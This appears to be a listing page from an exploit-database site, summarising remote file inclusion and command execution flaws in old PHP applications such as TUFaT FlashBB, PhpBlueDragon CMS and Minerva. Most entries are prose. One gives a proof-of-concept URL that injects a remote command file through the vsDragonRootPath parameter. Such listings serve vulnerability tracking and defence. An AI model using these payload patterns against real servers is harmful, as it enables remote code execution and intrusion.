header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

TUFaT FlashBB <= 1.1.5 (phpbb_root_path) Remote File Include Exploit

This exploit allows an attacker to include a remote file on the vulnerable server. It is triggered when the vulnerable application uses the phpbb_root_path parameter in the getmsg.php script without proper validation. This can be exploited to execute arbitrary PHP code by including a malicious file from a remote host.

Content*Builder <= 0.7.2 Remote File Include Vulnerability

Content*Builder is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code within the context of the webserver process. This may facilitate unauthorized access or privilege escalation.

PhpBlueDragon CMS 2.9.1, File inclusion vulnerability

Error occured in template.php, line 23: require($vsDragonRootPath."public_includes/pub_kernel/pbd_template_custom.php"); Proof of concept: http://example/[pbd_path]/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=[cmd_url]/ (note this is with final slash (/))

The Bible Portal Project (destination) <= 2.12 Remote File Include Vulnerability

The Bible Portal Project (destination) version 2.12 is vulnerable to a remote file include vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary code on the vulnerable server.

MyBibi Remote Command Execution Vulnerability

MyBibi is vulnerable to a remote command execution vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. This request contains malicious code which is then executed on the server. The malicious code is executed in the context of the web server process. This can allow an attacker to gain access to the server and execute arbitrary code.

Minerva (phpbb_root_path) <= 2.0.8a Build 237 Remote File Include Vulnerability

Minerva (phpbb_root_path) version 2.0.8a Build 237 is vulnerable to a remote file include vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This request contains a URL in the phpbb_root_path parameter that points to a malicious file hosted on a remote server. The malicious file is then executed on the vulnerable server.

Recent Exploits: